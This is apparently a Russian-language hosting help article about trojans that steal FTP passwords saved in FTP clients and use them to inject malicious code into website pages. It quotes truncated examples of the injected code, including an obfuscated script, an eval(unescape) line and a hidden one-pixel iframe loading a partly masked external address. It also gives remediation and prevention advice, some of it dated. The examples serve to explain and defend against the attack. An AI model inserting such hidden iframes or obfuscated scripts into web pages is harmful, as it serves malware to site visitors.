Вирус, заражающий файлы по ftp
Решение
С чего все начинается?
Пользователи Вашего сайта начинают жаловаться на то, что с Вашего сайта к ним загружаются трояны. Вы набираете в строке браузера свое любимое творение и О! Ужас! Антивирус начинает ругаться на скачивание трояна. Это в лучшем случае. Если Вас заразили старой версией или у Вас самые новые базы антивируса. В противном случае, Вы еще долго не будете знать, что у вас троян.
Если просмотреть исходный код, то вирус будет выглядеть примерно так :
< sсriрt >function v472ae9e6d9541(v472ae9e6d9d28){ function v472ae9e6da519 () ****document.write(v472ae9e6db4f9('****'));< / sсriрt >
или
< sсriрt >eval(unescape("***")); < /sсriрt >
или самый популярный - это фреймовый
< ifrаmе src='http://81.95.xxx.77/trаff.php' width='1' height='1' style='visibility:hidden'>< / ifrаmе >
Как это произошло?
Первая мысль, конечно, будет: "Файлы лежат у хостера. В файлах появился вирус. Хостера взломали и мне дописали вирус." и переполненные праведного гнева пишите/звоните в техническую поддержку хостера.
Но Вы далеко не первый, и сотрудник хостинга начинает Вам уставшим голосом рассказывать, откуда этот вирус.
Анализ возможного заражения привел к парадоксальному результату. Индексные страницы менялись после того, как проводилась авторегистрация сайтов в каталогах с помощью программы AllSubmitter или 1PS.ru. Сами программы, конечно, не виноваты, просто в базе данных находились "зараженные" ссылки. Простая логика говорит о том, что в этих базах находится одна или несколько ссылок на сайты, с которых загружается вирус-троян. Это, конечно, не единственный путь подхватить троян, но весьма популярный.
Опять же, простая логика показывает, что регистрируют в каталогах свой сайт, как правило, создатели сайта и уже после того как сайт размещен на хостинге. А если есть хостинг, то есть и фтп акаунт для подключения и загрузки туда файлов сайта. А учитывая лень-матушку, из-за которой фтп пароли сохраняют в фтп-клиенте, почему бы не своровать пароль из фтп-клиента на хостинг? Вот так и думает хакер. И подсадив на Ваш компьютер вирус-троян, похищает пароли, с их помощью подключается к серверу хостинга и дописывает в странички вредоносный код.
Хостера винить тут не за что. Взлома не было, перебора паролей не было. Просто к фтп подключился и ввел пароль с первого раза клиент. Вот так это выглядит со стороны хостингового сервера.
Что делать?
Нижеописанное делать только после проверки локального компьютера на вирусы!!!
1) Немедленно сменить пароль на фтп акаунт.
2) Немедленно сменить пароли на подключения к базе, почтовым ящикам, а также, логины и пароли, которые хранились в конфигурационных файлах (хакер мог их уже посмотреть).
3) Перезалить _все_ файлы из бекапа. Именно все. Вирус могли подсадить не только на самом видном месте файла, но и где то глубже спрятать.
При отсутствии бекапа _просите_ хостера восстановить. Именно просите, а не требуйте. И это должно быть просьбой, а не требованием ибо проблема это Ваша и хостер только по доброте душевной берется её решить.
Как сделать чтобы не повторилось?
1) Ставьте антивирусы!!! Они помогают. Не всегда, но помогают.
2) Если выходите в интернет с определенного количества айпи адресов, то воспользуйтесь ограничением подключения по фтп к вашему акаунту только с этих айпи.
Заражают Ваши файлы в основном с азиатских зараженных компьютеров, поэтому ограничение подключения уже поможет. А более точное ограничение сведет усилия хакеров почти на ноль.
3) Не сохраняйте пароли в фтп-клиентах. Они уязвимы и своровать оттуда пароль очень легко. Пишите пароль на бумажечке и храните эту бумажечку в сейфе ( ну или под матрасом если сейфа нет
.gif)
).4) !Регулярно! проверяйте файлы своего сайта.
5) Забудьте о Internet Explorer. 90 процентов вирусов-троянов загружаемых через интернет используют уязвимости именно этого браузера. У Firefox этих самых уязвимостей на два порядка меньше. Как говорится:
Как говорится - Internet Explorer очень полезная и удобная программа, с помощью которой можно зайти на сайт http://www.mozilla.org/ и скачать оттуда свежий Firefox.